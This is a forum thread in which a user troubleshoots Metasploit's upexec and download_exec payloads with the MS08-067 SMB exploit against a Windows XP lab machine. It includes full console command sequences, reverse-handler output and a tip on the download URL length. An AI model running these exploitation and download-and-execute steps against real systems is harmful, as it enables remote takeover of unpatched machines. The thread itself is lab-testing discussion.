Help using payload windows upexec

[MyOwnWay]

I'm testing the upexec but I'm not able to let it work, the ms08_067_netapi is working correctly with the meterpeter, but not with the upexec.

I' using BT4 RC2, and on the metasploit console i do:

use exploit/windows/smb/ms08_067_netapi
set payload windows/upexec/reverse_tcp
set rhost 192.168.1.2
set lhost 192.168.1.1
set pexec /root/data/payloads/test/calc.exe
exploit

I get:
[*] Started reverse handler on 192.168.1.1:4444[*] Automatically detecting the target...[*] Fingerprint: Windows XP - Service Pack 2[*] Selected Target: Windows XP SP2 (NX)[*] Attempting to trigger the vulnerability...[*] Sending stage (398 bytes) to 192.168.1.2[*] Sleeping before handling stage...

And it hang so...

Any help about using the upexec payload?

[comaX]

I never tried this particular exploit but a few basic verifications could be useful :
- have you desactivated your AV ?
- Same with firewall ?
- Is your victim system vulnerable to this exploit ? MS has patched it : http://www.microsoft.com/technet/sec.../ms08-067.mspx

[MyOwnWay]

Hi ComaX, I will try to explain better:

I never explored the upexec and download_exec payloads of the metasploit framework.

So the purpose of the test is to download / upload and execute an exe file as payload.
To make some tests I’m using two VM, one with BT4 RC2 and an XP Sp2 as victim.
The victim has the firewall disabled and no antivirus.
I’m trying to upload/download and execute the windows calculator (calc.exe)

I know that with a meterpeter session is possible with a simple upload and execute, and i have tried just to double-check after your post...

I’m experiencing some problems with both the following procedures in details:

1 ------------ WITH UPEXEC:
use exploit/windows/smb/ms08_067_netapi
set payload windows/upexec/reverse_tcp
set lhost 192.168.1.1
set rhost 192.168.1.2
set pexec /root/data/payloads/test/calc.exe
exploit

I got…

Started reverse handler on 192.168.1.1:4444
Automatically detecting the target...
Fingerprint: Windows XP - Service Pack 2
Selected Target: Windows XP SP2 (NX)
Attempting to trigger the vulnerability...
Sending stage (398 bytes) to 192.168.1.2
Sleeping before handling stage...

And it hang so without any result, the victim do not run the calc.exe
I have also tried with a server application but nothing...

So I have tried with a similar payload,

2 ------------ WITH DOWNLOAD_EXEC:
use exploit/windows/smb/ms08_067_netapi
set payload windows/download_exec
set lhost 192.168.1.1
set rhost 192.168.1.2
set url http://192.168.1.1/c.exe (httpd obviously active)
exploit

I got…

Automatically detecting the target...
Fingerprint: Windows XP - Service Pack 2
Selected Target: Windows XP SP2 (NX)
Attempting to trigger the vulnerability...
Exploit completed, but no session was created.

Even in that case the exe will not be executed on the victim…
And checking the apache log, i can not see any request on the server...

If you have time, and you are curious, I would like you to try personally those two payloads, that by the way i think to be very useful...

As small tip, remember that the argument URL on the download_exec accept max 24 chars (after you will get a buffer error) so your url may be something like 192.168.1.1/1.exe (not 192.168.1.1/payload_test.exe)...

When you have 10 minutes, if you are interested please let me know, I appreciate.